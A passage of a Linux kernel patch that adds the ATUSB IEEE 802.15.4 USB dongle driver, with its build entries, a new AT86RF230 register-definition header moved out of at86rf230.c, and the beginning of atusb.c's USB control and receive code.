transceiver driver" + depends on IEEE802154_DRIVERS && MAC802154 && USB + ---help--- + Say Y here to enable the ATUSB IEEE 802.15.4 wireless + controller. + + This driver can also be built as a module. To do so say M here. + The module will be called 'atusb'. diff --git a/drivers/net/ieee802154/Makefile b/drivers/net/ieee802154/Makefile index d77fa4d77e27..cf1d2a6db023 100644 --- a/drivers/net/ieee802154/Makefile +++ b/drivers/net/ieee802154/Makefile @@ -2,3 +2,4 @@ obj-$(CONFIG_IEEE802154_FAKELB) += fakelb.o obj-$(CONFIG_IEEE802154_AT86RF230) += at86rf230.o obj-$(CONFIG_IEEE802154_MRF24J40) += mrf24j40.o obj-$(CONFIG_IEEE802154_CC2520) += cc2520.o +obj-$(CONFIG_IEEE802154_ATUSB) += atusb.o diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 8d5ed6e23ddb..d417ceb67626 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -35,6 +35,8 @@ #include #include +#include "at86rf230.h" + struct at86rf230_local; /* at86rf2xx chip depend data. * All timings are in us. 
@@ -102,203 +104,6 @@ struct at86rf230_local { struct at86rf230_state_change tx; }; -#define RG_TRX_STATUS (0x01) -#define SR_TRX_STATUS 0x01, 0x1f, 0 -#define SR_RESERVED_01_3 0x01, 0x20, 5 -#define SR_CCA_STATUS 0x01, 0x40, 6 -#define SR_CCA_DONE 0x01, 0x80, 7 -#define RG_TRX_STATE (0x02) -#define SR_TRX_CMD 0x02, 0x1f, 0 -#define SR_TRAC_STATUS 0x02, 0xe0, 5 -#define RG_TRX_CTRL_0 (0x03) -#define SR_CLKM_CTRL 0x03, 0x07, 0 -#define SR_CLKM_SHA_SEL 0x03, 0x08, 3 -#define SR_PAD_IO_CLKM 0x03, 0x30, 4 -#define SR_PAD_IO 0x03, 0xc0, 6 -#define RG_TRX_CTRL_1 (0x04) -#define SR_IRQ_POLARITY 0x04, 0x01, 0 -#define SR_IRQ_MASK_MODE 0x04, 0x02, 1 -#define SR_SPI_CMD_MODE 0x04, 0x0c, 2 -#define SR_RX_BL_CTRL 0x04, 0x10, 4 -#define SR_TX_AUTO_CRC_ON 0x04, 0x20, 5 -#define SR_IRQ_2_EXT_EN 0x04, 0x40, 6 -#define SR_PA_EXT_EN 0x04, 0x80, 7 -#define RG_PHY_TX_PWR (0x05) -#define SR_TX_PWR_23X 0x05, 0x0f, 0 -#define SR_PA_LT_230 0x05, 0x30, 4 -#define SR_PA_BUF_LT_230 0x05, 0xc0, 6 -#define SR_TX_PWR_212 0x05, 0x1f, 0 -#define SR_GC_PA_212 0x05, 0x60, 5 -#define SR_PA_BOOST_LT_212 0x05, 0x80, 7 -#define RG_PHY_RSSI (0x06) -#define SR_RSSI 0x06, 0x1f, 0 -#define SR_RND_VALUE 0x06, 0x60, 5 -#define SR_RX_CRC_VALID 0x06, 0x80, 7 -#define RG_PHY_ED_LEVEL (0x07) -#define SR_ED_LEVEL 0x07, 0xff, 0 -#define RG_PHY_CC_CCA (0x08) -#define SR_CHANNEL 0x08, 0x1f, 0 -#define SR_CCA_MODE 0x08, 0x60, 5 -#define SR_CCA_REQUEST 0x08, 0x80, 7 -#define RG_CCA_THRES (0x09) -#define SR_CCA_ED_THRES 0x09, 0x0f, 0 -#define SR_RESERVED_09_1 0x09, 0xf0, 4 -#define RG_RX_CTRL (0x0a) -#define SR_PDT_THRES 0x0a, 0x0f, 0 -#define SR_RESERVED_0a_1 0x0a, 0xf0, 4 -#define RG_SFD_VALUE (0x0b) -#define SR_SFD_VALUE 0x0b, 0xff, 0 -#define RG_TRX_CTRL_2 (0x0c) -#define SR_OQPSK_DATA_RATE 0x0c, 0x03, 0 -#define SR_SUB_MODE 0x0c, 0x04, 2 -#define SR_BPSK_QPSK 0x0c, 0x08, 3 -#define SR_OQPSK_SUB1_RC_EN 0x0c, 0x10, 4 -#define SR_RESERVED_0c_5 0x0c, 0x60, 5 -#define SR_RX_SAFE_MODE 0x0c, 0x80, 7 -#define RG_ANT_DIV (0x0d) -#define SR_ANT_CTRL 0x0d, 0x03, 0 -#define SR_ANT_EXT_SW_EN 0x0d, 0x04, 2 -#define SR_ANT_DIV_EN 0x0d, 0x08, 3 -#define SR_RESERVED_0d_2 0x0d, 0x70, 4 -#define SR_ANT_SEL 0x0d, 0x80, 7 -#define RG_IRQ_MASK (0x0e) -#define SR_IRQ_MASK 0x0e, 0xff, 0 -#define RG_IRQ_STATUS (0x0f) -#define SR_IRQ_0_PLL_LOCK 0x0f, 0x01, 0 -#define SR_IRQ_1_PLL_UNLOCK 0x0f, 0x02, 1 -#define SR_IRQ_2_RX_START 0x0f, 0x04, 2 -#define SR_IRQ_3_TRX_END 0x0f, 0x08, 3 -#define SR_IRQ_4_CCA_ED_DONE 0x0f, 0x10, 4 -#define SR_IRQ_5_AMI 0x0f, 0x20, 5 -#define SR_IRQ_6_TRX_UR 0x0f, 0x40, 6 -#define SR_IRQ_7_BAT_LOW 0x0f, 0x80, 7 -#define RG_VREG_CTRL (0x10) -#define SR_RESERVED_10_6 0x10, 0x03, 0 -#define SR_DVDD_OK 0x10, 0x04, 2 -#define SR_DVREG_EXT 0x10, 0x08, 3 -#define SR_RESERVED_10_3 0x10, 0x30, 4 -#define SR_AVDD_OK 0x10, 0x40, 6 -#define SR_AVREG_EXT 0x10, 0x80, 7 -#define RG_BATMON (0x11) -#define SR_BATMON_VTH 0x11, 0x0f, 0 -#define SR_BATMON_HR 0x11, 0x10, 4 -#define SR_BATMON_OK 0x11, 0x20, 5 -#define SR_RESERVED_11_1 0x11, 0xc0, 6 -#define RG_XOSC_CTRL (0x12) -#define SR_XTAL_TRIM 0x12, 0x0f, 0 -#define SR_XTAL_MODE 0x12, 0xf0, 4 -#define RG_RX_SYN (0x15) -#define SR_RX_PDT_LEVEL 0x15, 0x0f, 0 -#define SR_RESERVED_15_2 0x15, 0x70, 4 -#define SR_RX_PDT_DIS 0x15, 0x80, 7 -#define RG_XAH_CTRL_1 (0x17) -#define SR_RESERVED_17_8 0x17, 0x01, 0 -#define SR_AACK_PROM_MODE 0x17, 0x02, 1 -#define SR_AACK_ACK_TIME 0x17, 0x04, 2 -#define SR_RESERVED_17_5 0x17, 0x08, 3 -#define SR_AACK_UPLD_RES_FT 0x17, 0x10, 4 -#define SR_AACK_FLTR_RES_FT 0x17, 0x20, 5 
-#define SR_CSMA_LBT_MODE 0x17, 0x40, 6 -#define SR_RESERVED_17_1 0x17, 0x80, 7 -#define RG_FTN_CTRL (0x18) -#define SR_RESERVED_18_2 0x18, 0x7f, 0 -#define SR_FTN_START 0x18, 0x80, 7 -#define RG_PLL_CF (0x1a) -#define SR_RESERVED_1a_2 0x1a, 0x7f, 0 -#define SR_PLL_CF_START 0x1a, 0x80, 7 -#define RG_PLL_DCU (0x1b) -#define SR_RESERVED_1b_3 0x1b, 0x3f, 0 -#define SR_RESERVED_1b_2 0x1b, 0x40, 6 -#define SR_PLL_DCU_START 0x1b, 0x80, 7 -#define RG_PART_NUM (0x1c) -#define SR_PART_NUM 0x1c, 0xff, 0 -#define RG_VERSION_NUM (0x1d) -#define SR_VERSION_NUM 0x1d, 0xff, 0 -#define RG_MAN_ID_0 (0x1e) -#define SR_MAN_ID_0 0x1e, 0xff, 0 -#define RG_MAN_ID_1 (0x1f) -#define SR_MAN_ID_1 0x1f, 0xff, 0 -#define RG_SHORT_ADDR_0 (0x20) -#define SR_SHORT_ADDR_0 0x20, 0xff, 0 -#define RG_SHORT_ADDR_1 (0x21) -#define SR_SHORT_ADDR_1 0x21, 0xff, 0 -#define RG_PAN_ID_0 (0x22) -#define SR_PAN_ID_0 0x22, 0xff, 0 -#define RG_PAN_ID_1 (0x23) -#define SR_PAN_ID_1 0x23, 0xff, 0 -#define RG_IEEE_ADDR_0 (0x24) -#define SR_IEEE_ADDR_0 0x24, 0xff, 0 -#define RG_IEEE_ADDR_1 (0x25) -#define SR_IEEE_ADDR_1 0x25, 0xff, 0 -#define RG_IEEE_ADDR_2 (0x26) -#define SR_IEEE_ADDR_2 0x26, 0xff, 0 -#define RG_IEEE_ADDR_3 (0x27) -#define SR_IEEE_ADDR_3 0x27, 0xff, 0 -#define RG_IEEE_ADDR_4 (0x28) -#define SR_IEEE_ADDR_4 0x28, 0xff, 0 -#define RG_IEEE_ADDR_5 (0x29) -#define SR_IEEE_ADDR_5 0x29, 0xff, 0 -#define RG_IEEE_ADDR_6 (0x2a) -#define SR_IEEE_ADDR_6 0x2a, 0xff, 0 -#define RG_IEEE_ADDR_7 (0x2b) -#define SR_IEEE_ADDR_7 0x2b, 0xff, 0 -#define RG_XAH_CTRL_0 (0x2c) -#define SR_SLOTTED_OPERATION 0x2c, 0x01, 0 -#define SR_MAX_CSMA_RETRIES 0x2c, 0x0e, 1 -#define SR_MAX_FRAME_RETRIES 0x2c, 0xf0, 4 -#define RG_CSMA_SEED_0 (0x2d) -#define SR_CSMA_SEED_0 0x2d, 0xff, 0 -#define RG_CSMA_SEED_1 (0x2e) -#define SR_CSMA_SEED_1 0x2e, 0x07, 0 -#define SR_AACK_I_AM_COORD 0x2e, 0x08, 3 -#define SR_AACK_DIS_ACK 0x2e, 0x10, 4 -#define SR_AACK_SET_PD 0x2e, 0x20, 5 -#define SR_AACK_FVN_MODE 0x2e, 0xc0, 6 -#define RG_CSMA_BE (0x2f) -#define SR_MIN_BE 0x2f, 0x0f, 0 -#define SR_MAX_BE 0x2f, 0xf0, 4 - -#define CMD_REG 0x80 -#define CMD_REG_MASK 0x3f -#define CMD_WRITE 0x40 -#define CMD_FB 0x20 - -#define IRQ_BAT_LOW (1 << 7) -#define IRQ_TRX_UR (1 << 6) -#define IRQ_AMI (1 << 5) -#define IRQ_CCA_ED (1 << 4) -#define IRQ_TRX_END (1 << 3) -#define IRQ_RX_START (1 << 2) -#define IRQ_PLL_UNL (1 << 1) -#define IRQ_PLL_LOCK (1 << 0) - -#define IRQ_ACTIVE_HIGH 0 -#define IRQ_ACTIVE_LOW 1 - -#define STATE_P_ON 0x00 /* BUSY */ -#define STATE_BUSY_RX 0x01 -#define STATE_BUSY_TX 0x02 -#define STATE_FORCE_TRX_OFF 0x03 -#define STATE_FORCE_TX_ON 0x04 /* IDLE */ -/* 0x05 */ /* INVALID_PARAMETER */ -#define STATE_RX_ON 0x06 -/* 0x07 */ /* SUCCESS */ -#define STATE_TRX_OFF 0x08 -#define STATE_TX_ON 0x09 -/* 0x0a - 0x0e */ /* 0x0a - UNSUPPORTED_ATTRIBUTE */ -#define STATE_SLEEP 0x0F -#define STATE_PREP_DEEP_SLEEP 0x10 -#define STATE_BUSY_RX_AACK 0x11 -#define STATE_BUSY_TX_ARET 0x12 -#define STATE_RX_AACK_ON 0x16 -#define STATE_TX_ARET_ON 0x19 -#define STATE_RX_ON_NOCLK 0x1C -#define STATE_RX_AACK_ON_NOCLK 0x1D -#define STATE_BUSY_RX_AACK_NOCLK 0x1E -#define STATE_TRANSITION_IN_PROGRESS 0x1F - -#define TRX_STATE_MASK (0x1F) - #define AT86RF2XX_NUMREGS 0x3F static void diff --git a/drivers/net/ieee802154/at86rf230.h b/drivers/net/ieee802154/at86rf230.h new file mode 100644 index 000000000000..1e6d1cc677f6 --- /dev/null +++ b/drivers/net/ieee802154/at86rf230.h @@ -0,0 +1,220 @@ +/* + * AT86RF230/RF231 driver + * + * Copyright (C) 2009-2012 Siemens AG + * + * This program is free 
software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * Written by: + * Dmitry Eremin-Solenikov + * Alexander Smirnov + */ + +#ifndef _AT86RF230_H +#define _AT86RF230_H + +#define RG_TRX_STATUS (0x01) +#define SR_TRX_STATUS 0x01, 0x1f, 0 +#define SR_RESERVED_01_3 0x01, 0x20, 5 +#define SR_CCA_STATUS 0x01, 0x40, 6 +#define SR_CCA_DONE 0x01, 0x80, 7 +#define RG_TRX_STATE (0x02) +#define SR_TRX_CMD 0x02, 0x1f, 0 +#define SR_TRAC_STATUS 0x02, 0xe0, 5 +#define RG_TRX_CTRL_0 (0x03) +#define SR_CLKM_CTRL 0x03, 0x07, 0 +#define SR_CLKM_SHA_SEL 0x03, 0x08, 3 +#define SR_PAD_IO_CLKM 0x03, 0x30, 4 +#define SR_PAD_IO 0x03, 0xc0, 6 +#define RG_TRX_CTRL_1 (0x04) +#define SR_IRQ_POLARITY 0x04, 0x01, 0 +#define SR_IRQ_MASK_MODE 0x04, 0x02, 1 +#define SR_SPI_CMD_MODE 0x04, 0x0c, 2 +#define SR_RX_BL_CTRL 0x04, 0x10, 4 +#define SR_TX_AUTO_CRC_ON 0x04, 0x20, 5 +#define SR_IRQ_2_EXT_EN 0x04, 0x40, 6 +#define SR_PA_EXT_EN 0x04, 0x80, 7 +#define RG_PHY_TX_PWR (0x05) +#define SR_TX_PWR_23X 0x05, 0x0f, 0 +#define SR_PA_LT_230 0x05, 0x30, 4 +#define SR_PA_BUF_LT_230 0x05, 0xc0, 6 +#define SR_TX_PWR_212 0x05, 0x1f, 0 +#define SR_GC_PA_212 0x05, 0x60, 5 +#define SR_PA_BOOST_LT_212 0x05, 0x80, 7 +#define RG_PHY_RSSI (0x06) +#define SR_RSSI 0x06, 0x1f, 0 +#define SR_RND_VALUE 0x06, 0x60, 5 +#define SR_RX_CRC_VALID 0x06, 0x80, 7 +#define RG_PHY_ED_LEVEL (0x07) +#define SR_ED_LEVEL 0x07, 0xff, 0 +#define RG_PHY_CC_CCA (0x08) +#define SR_CHANNEL 0x08, 0x1f, 0 +#define SR_CCA_MODE 0x08, 0x60, 5 +#define SR_CCA_REQUEST 0x08, 0x80, 7 +#define RG_CCA_THRES (0x09) +#define SR_CCA_ED_THRES 0x09, 0x0f, 0 +#define SR_RESERVED_09_1 0x09, 0xf0, 4 +#define RG_RX_CTRL (0x0a) +#define SR_PDT_THRES 0x0a, 0x0f, 0 +#define SR_RESERVED_0a_1 0x0a, 0xf0, 4 +#define RG_SFD_VALUE (0x0b) +#define SR_SFD_VALUE 0x0b, 0xff, 0 +#define RG_TRX_CTRL_2 (0x0c) +#define SR_OQPSK_DATA_RATE 0x0c, 0x03, 0 +#define SR_SUB_MODE 0x0c, 0x04, 2 +#define SR_BPSK_QPSK 0x0c, 0x08, 3 +#define SR_OQPSK_SUB1_RC_EN 0x0c, 0x10, 4 +#define SR_RESERVED_0c_5 0x0c, 0x60, 5 +#define SR_RX_SAFE_MODE 0x0c, 0x80, 7 +#define RG_ANT_DIV (0x0d) +#define SR_ANT_CTRL 0x0d, 0x03, 0 +#define SR_ANT_EXT_SW_EN 0x0d, 0x04, 2 +#define SR_ANT_DIV_EN 0x0d, 0x08, 3 +#define SR_RESERVED_0d_2 0x0d, 0x70, 4 +#define SR_ANT_SEL 0x0d, 0x80, 7 +#define RG_IRQ_MASK (0x0e) +#define SR_IRQ_MASK 0x0e, 0xff, 0 +#define RG_IRQ_STATUS (0x0f) +#define SR_IRQ_0_PLL_LOCK 0x0f, 0x01, 0 +#define SR_IRQ_1_PLL_UNLOCK 0x0f, 0x02, 1 +#define SR_IRQ_2_RX_START 0x0f, 0x04, 2 +#define SR_IRQ_3_TRX_END 0x0f, 0x08, 3 +#define SR_IRQ_4_CCA_ED_DONE 0x0f, 0x10, 4 +#define SR_IRQ_5_AMI 0x0f, 0x20, 5 +#define SR_IRQ_6_TRX_UR 0x0f, 0x40, 6 +#define SR_IRQ_7_BAT_LOW 0x0f, 0x80, 7 +#define RG_VREG_CTRL (0x10) +#define SR_RESERVED_10_6 0x10, 0x03, 0 +#define SR_DVDD_OK 0x10, 0x04, 2 +#define SR_DVREG_EXT 0x10, 0x08, 3 +#define SR_RESERVED_10_3 0x10, 0x30, 4 +#define SR_AVDD_OK 0x10, 0x40, 6 +#define SR_AVREG_EXT 0x10, 0x80, 7 +#define RG_BATMON (0x11) +#define SR_BATMON_VTH 0x11, 0x0f, 0 +#define SR_BATMON_HR 0x11, 0x10, 4 +#define SR_BATMON_OK 0x11, 0x20, 5 +#define SR_RESERVED_11_1 0x11, 0xc0, 6 +#define RG_XOSC_CTRL (0x12) +#define SR_XTAL_TRIM 0x12, 0x0f, 0 
+#define SR_XTAL_MODE 0x12, 0xf0, 4 +#define RG_RX_SYN (0x15) +#define SR_RX_PDT_LEVEL 0x15, 0x0f, 0 +#define SR_RESERVED_15_2 0x15, 0x70, 4 +#define SR_RX_PDT_DIS 0x15, 0x80, 7 +#define RG_XAH_CTRL_1 (0x17) +#define SR_RESERVED_17_8 0x17, 0x01, 0 +#define SR_AACK_PROM_MODE 0x17, 0x02, 1 +#define SR_AACK_ACK_TIME 0x17, 0x04, 2 +#define SR_RESERVED_17_5 0x17, 0x08, 3 +#define SR_AACK_UPLD_RES_FT 0x17, 0x10, 4 +#define SR_AACK_FLTR_RES_FT 0x17, 0x20, 5 +#define SR_CSMA_LBT_MODE 0x17, 0x40, 6 +#define SR_RESERVED_17_1 0x17, 0x80, 7 +#define RG_FTN_CTRL (0x18) +#define SR_RESERVED_18_2 0x18, 0x7f, 0 +#define SR_FTN_START 0x18, 0x80, 7 +#define RG_PLL_CF (0x1a) +#define SR_RESERVED_1a_2 0x1a, 0x7f, 0 +#define SR_PLL_CF_START 0x1a, 0x80, 7 +#define RG_PLL_DCU (0x1b) +#define SR_RESERVED_1b_3 0x1b, 0x3f, 0 +#define SR_RESERVED_1b_2 0x1b, 0x40, 6 +#define SR_PLL_DCU_START 0x1b, 0x80, 7 +#define RG_PART_NUM (0x1c) +#define SR_PART_NUM 0x1c, 0xff, 0 +#define RG_VERSION_NUM (0x1d) +#define SR_VERSION_NUM 0x1d, 0xff, 0 +#define RG_MAN_ID_0 (0x1e) +#define SR_MAN_ID_0 0x1e, 0xff, 0 +#define RG_MAN_ID_1 (0x1f) +#define SR_MAN_ID_1 0x1f, 0xff, 0 +#define RG_SHORT_ADDR_0 (0x20) +#define SR_SHORT_ADDR_0 0x20, 0xff, 0 +#define RG_SHORT_ADDR_1 (0x21) +#define SR_SHORT_ADDR_1 0x21, 0xff, 0 +#define RG_PAN_ID_0 (0x22) +#define SR_PAN_ID_0 0x22, 0xff, 0 +#define RG_PAN_ID_1 (0x23) +#define SR_PAN_ID_1 0x23, 0xff, 0 +#define RG_IEEE_ADDR_0 (0x24) +#define SR_IEEE_ADDR_0 0x24, 0xff, 0 +#define RG_IEEE_ADDR_1 (0x25) +#define SR_IEEE_ADDR_1 0x25, 0xff, 0 +#define RG_IEEE_ADDR_2 (0x26) +#define SR_IEEE_ADDR_2 0x26, 0xff, 0 +#define RG_IEEE_ADDR_3 (0x27) +#define SR_IEEE_ADDR_3 0x27, 0xff, 0 +#define RG_IEEE_ADDR_4 (0x28) +#define SR_IEEE_ADDR_4 0x28, 0xff, 0 +#define RG_IEEE_ADDR_5 (0x29) +#define SR_IEEE_ADDR_5 0x29, 0xff, 0 +#define RG_IEEE_ADDR_6 (0x2a) +#define SR_IEEE_ADDR_6 0x2a, 0xff, 0 +#define RG_IEEE_ADDR_7 (0x2b) +#define SR_IEEE_ADDR_7 0x2b, 0xff, 0 +#define RG_XAH_CTRL_0 (0x2c) +#define SR_SLOTTED_OPERATION 0x2c, 0x01, 0 +#define SR_MAX_CSMA_RETRIES 0x2c, 0x0e, 1 +#define SR_MAX_FRAME_RETRIES 0x2c, 0xf0, 4 +#define RG_CSMA_SEED_0 (0x2d) +#define SR_CSMA_SEED_0 0x2d, 0xff, 0 +#define RG_CSMA_SEED_1 (0x2e) +#define SR_CSMA_SEED_1 0x2e, 0x07, 0 +#define SR_AACK_I_AM_COORD 0x2e, 0x08, 3 +#define SR_AACK_DIS_ACK 0x2e, 0x10, 4 +#define SR_AACK_SET_PD 0x2e, 0x20, 5 +#define SR_AACK_FVN_MODE 0x2e, 0xc0, 6 +#define RG_CSMA_BE (0x2f) +#define SR_MIN_BE 0x2f, 0x0f, 0 +#define SR_MAX_BE 0x2f, 0xf0, 4 + +#define CMD_REG 0x80 +#define CMD_REG_MASK 0x3f +#define CMD_WRITE 0x40 +#define CMD_FB 0x20 + +#define IRQ_BAT_LOW BIT(7) +#define IRQ_TRX_UR BIT(6) +#define IRQ_AMI BIT(5) +#define IRQ_CCA_ED BIT(4) +#define IRQ_TRX_END BIT(3) +#define IRQ_RX_START BIT(2) +#define IRQ_PLL_UNL BIT(1) +#define IRQ_PLL_LOCK BIT(0) + +#define IRQ_ACTIVE_HIGH 0 +#define IRQ_ACTIVE_LOW 1 + +#define STATE_P_ON 0x00 /* BUSY */ +#define STATE_BUSY_RX 0x01 +#define STATE_BUSY_TX 0x02 +#define STATE_FORCE_TRX_OFF 0x03 +#define STATE_FORCE_TX_ON 0x04 /* IDLE */ +/* 0x05 */ /* INVALID_PARAMETER */ +#define STATE_RX_ON 0x06 +/* 0x07 */ /* SUCCESS */ +#define STATE_TRX_OFF 0x08 +#define STATE_TX_ON 0x09 +/* 0x0a - 0x0e */ /* 0x0a - UNSUPPORTED_ATTRIBUTE */ +#define STATE_SLEEP 0x0F +#define STATE_PREP_DEEP_SLEEP 0x10 +#define STATE_BUSY_RX_AACK 0x11 +#define STATE_BUSY_TX_ARET 0x12 +#define STATE_RX_AACK_ON 0x16 +#define STATE_TX_ARET_ON 0x19 +#define STATE_RX_ON_NOCLK 0x1C +#define STATE_RX_AACK_ON_NOCLK 0x1D +#define STATE_BUSY_RX_AACK_NOCLK 
0x1E +#define STATE_TRANSITION_IN_PROGRESS 0x1F + +#define TRX_STATE_MASK (0x1F) + +#endif /* !_AT86RF230_H */ diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c new file mode 100644 index 000000000000..ea1259ef8508 --- /dev/null +++ b/drivers/net/ieee802154/atusb.c @@ -0,0 +1,692 @@ +/* + * atusb.c - Driver for the ATUSB IEEE 802.15.4 dongle + * + * Written 2013 by Werner Almesberger + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation, version 2 + * + * Based on at86rf230.c and spi_atusb.c. + * at86rf230.c is + * Copyright (C) 2009 Siemens AG + * Written by: Dmitry Eremin-Solenikov + * + * spi_atusb.c is + * Copyright (c) 2011 Richard Sharpe + * Copyright (c) 2011 Stefan Schmidt + * Copyright (c) 2011 Werner Almesberger + * + * USB initialization is + * Copyright (c) 2013 Alexander Aring + */ + +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "at86rf230.h" +#include "atusb.h" + +#define ATUSB_JEDEC_ATMEL 0x1f /* JEDEC manufacturer ID */ + +#define ATUSB_NUM_RX_URBS 4 /* allow for a bit of local latency */ +#define ATUSB_ALLOC_DELAY_MS 100 /* delay after failed allocation */ +#define ATUSB_TX_TIMEOUT_MS 200 /* on the air timeout */ + +struct atusb { + struct ieee802154_hw *hw; + struct usb_device *usb_dev; + int shutdown; /* non-zero if shutting down */ + int err; /* set by first error */ + + /* RX variables */ + struct delayed_work work; /* memory allocations */ + struct usb_anchor idle_urbs; /* URBs waiting to be submitted */ + struct usb_anchor rx_urbs; /* URBs waiting for reception */ + + /* TX variables */ + struct usb_ctrlrequest tx_dr; + struct urb *tx_urb; + struct sk_buff *tx_skb; + uint8_t tx_ack_seq; /* current TX ACK sequence number */ +}; + +/* at86rf230.h defines values as tuples. We use the more + * traditional style of having registers and or-able values. SR_REG extracts + * the register number. SR_VALUE uses the shift to prepare a value accordingly. + */ + +#define __SR_REG(reg, mask, shift) (reg) +#define SR_REG(sr) __SR_REG(sr) + +#define __SR_VALUE(reg, mask, shift, val) ((val) << (shift)) +#define SR_VALUE(sr, val) __SR_VALUE(sr, (val)) + +/* ----- USB commands without data ----------------------------------------- */ + +/* To reduce the number of error checks in the code, we record the first error + * in atusb->err and reject all subsequent requests until the error is cleared. 
+ */ + +static int atusb_control_msg(struct atusb *atusb, unsigned int pipe, + __u8 request, __u8 requesttype, + __u16 value, __u16 index, + void *data, __u16 size, int timeout) +{ + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + + if (atusb->err) + return atusb->err; + + ret = usb_control_msg(usb_dev, pipe, request, requesttype, + value, index, data, size, timeout); + if (ret < 0) { + atusb->err = ret; + dev_err(&usb_dev->dev, + "atusb_control_msg: req 0x%02x val 0x%x idx 0x%x, error %d\n", + request, value, index, ret); + } + return ret; +} + +static int atusb_command(struct atusb *atusb, uint8_t cmd, uint8_t arg) +{ + struct usb_device *usb_dev = atusb->usb_dev; + + dev_dbg(&usb_dev->dev, "atusb_command: cmd = 0x%x\n", cmd); + return atusb_control_msg(atusb, usb_sndctrlpipe(usb_dev, 0), + cmd, ATUSB_REQ_TO_DEV, arg, 0, NULL, 0, 1000); +} + +static int atusb_write_reg(struct atusb *atusb, uint8_t reg, uint8_t value) +{ + struct usb_device *usb_dev = atusb->usb_dev; + + dev_dbg(&usb_dev->dev, "atusb_write_reg: 0x%02x <- 0x%02x\n", + reg, value); + return atusb_control_msg(atusb, usb_sndctrlpipe(usb_dev, 0), + ATUSB_REG_WRITE, ATUSB_REQ_TO_DEV, + value, reg, NULL, 0, 1000); +} + +static int atusb_read_reg(struct atusb *atusb, uint8_t reg) +{ + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + uint8_t value; + + dev_dbg(&usb_dev->dev, "atusb: reg = 0x%x\n", reg); + ret = atusb_control_msg(atusb, usb_rcvctrlpipe(usb_dev, 0), + ATUSB_REG_READ, ATUSB_REQ_FROM_DEV, + 0, reg, &value, 1, 1000); + return ret >= 0 ? value : ret; +} + +static int atusb_get_and_clear_error(struct atusb *atusb) +{ + int err = atusb->err; + + atusb->err = 0; + return err; +} + +/* ----- skb allocation ---------------------------------------------------- */ + +#define MAX_PSDU 127 +#define MAX_RX_XFER (1 + MAX_PSDU + 2 + 1) /* PHR+PSDU+CRC+LQI */ + +#define SKB_ATUSB(skb) (*(struct atusb **)(skb)->cb) + +static void atusb_in(struct urb *urb); + +static int atusb_submit_rx_urb(struct atusb *atusb, struct urb *urb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + struct sk_buff *skb = urb->context; + int ret; + + if (!skb) { + skb = alloc_skb(MAX_RX_XFER, GFP_KERNEL); + if (!skb) { + dev_warn_ratelimited(&usb_dev->dev, + "atusb_in: can't allocate skb\n"); + return -ENOMEM; + } + skb_put(skb, MAX_RX_XFER); + SKB_ATUSB(skb) = atusb; + } + + usb_fill_bulk_urb(urb, usb_dev, usb_rcvbulkpipe(usb_dev, 1), + skb->data, MAX_RX_XFER, atusb_in, skb); + usb_anchor_urb(urb, &atusb->rx_urbs); + + ret = usb_submit_urb(urb, GFP_KERNEL); + if (ret) { + usb_unanchor_urb(urb); + kfree_skb(skb); + urb->context = NULL; + } + return ret; +} + +static void atusb_work_urbs(struct work_struct *work) +{ + struct atusb *atusb = + container_of(to_delayed_work(work), struct atusb, work); + struct usb_device *usb_dev = atusb->usb_dev; + struct urb *urb; + int ret; + + if (atusb->shutdown) + return; + + do { + urb = usb_get_from_anchor(&atusb->idle_urbs); + if (!urb) + return; + ret = atusb_submit_rx_urb(atusb, urb); + } while (!ret); + + usb_anchor_urb(urb, &atusb->idle_urbs); + dev_warn_ratelimited(&usb_dev->dev, + "atusb_in: can't allocate/submit URB (%d)\n", ret); + schedule_delayed_work(&atusb->work, + msecs_to_jiffies(ATUSB_ALLOC_DELAY_MS) + 1); +} + +/* ----- Asynchronous USB -------------------------------------------------- */ + +static void atusb_tx_done(struct atusb *atusb, uint8_t seq) +{ + struct usb_device *usb_dev = atusb->usb_dev; + uint8_t expect = atusb->tx_ack_seq; + + dev_dbg(&usb_dev->dev, "atusb_tx_done 
(0x%02x/0x%02x)\n", seq, expect); + if (seq == expect) { + /* TODO check for ifs handling in firmware */ + ieee802154_xmit_complete(atusb->hw, atusb->tx_skb, false); + } else { + /* TODO I experience this case when atusb has a tx complete + * irq before probing, we should fix the firmware it's an + * unlikely case now that seq == expect is then true, but can + * happen and fail with a tx_skb = NULL; + */ + ieee802154_wake_queue(atusb->hw); + if (atusb->tx_skb) + dev_kfree_skb_irq(atusb->tx_skb); + } +} + +static void atusb_in_good(struct urb *urb) +{ + struct usb_device *usb_dev = urb->dev; + struct sk_buff *skb = urb->context; + struct atusb *atusb = SKB_ATUSB(skb); + uint8_t len, lqi; + + if (!urb->actual_length) { + dev_dbg(&usb_dev->dev, "atusb_in: zero-sized URB ?\n"); + return; + } + + len = *skb->data; + + if (urb->actual_length == 1) { + atusb_tx_done(atusb, len); + return; + } + + if (len + 1 > urb->actual_length - 1) { + dev_dbg(&usb_dev->dev, "atusb_in: frame len %d+1 > URB %u-1\n", + len, urb->actual_length); + return; + } + + if (!ieee802154_is_valid_psdu_len(len)) { + dev_dbg(&usb_dev->dev, "atusb_in: frame corrupted\n"); + return; + } + + lqi = skb->data[len + 1]; + dev_dbg(&usb_dev->dev, "atusb_in: rx len %d lqi 0x%02x\n", len, lqi); + skb_pull(skb, 1); /* remove PHR */ + skb_trim(skb, len); /* get payload only */ + ieee802154_rx_irqsafe(atusb->hw, skb, lqi); + urb->context = NULL; /* skb is gone */ +} + +static void atusb_in(struct urb *urb) +{ + struct usb_device *usb_dev = urb->dev; + struct sk_buff *skb = urb->context; + struct atusb *atusb = SKB_ATUSB(skb); + + dev_dbg(&usb_dev->dev, "atusb_in: status %d len %d\n", + urb->status, urb->actual_length); + if (urb->status) { + if (urb->status == -ENOENT) { /* being killed */ + kfree_skb(skb); + urb->context = NULL; + return; + } + dev_dbg(&usb_dev->dev, 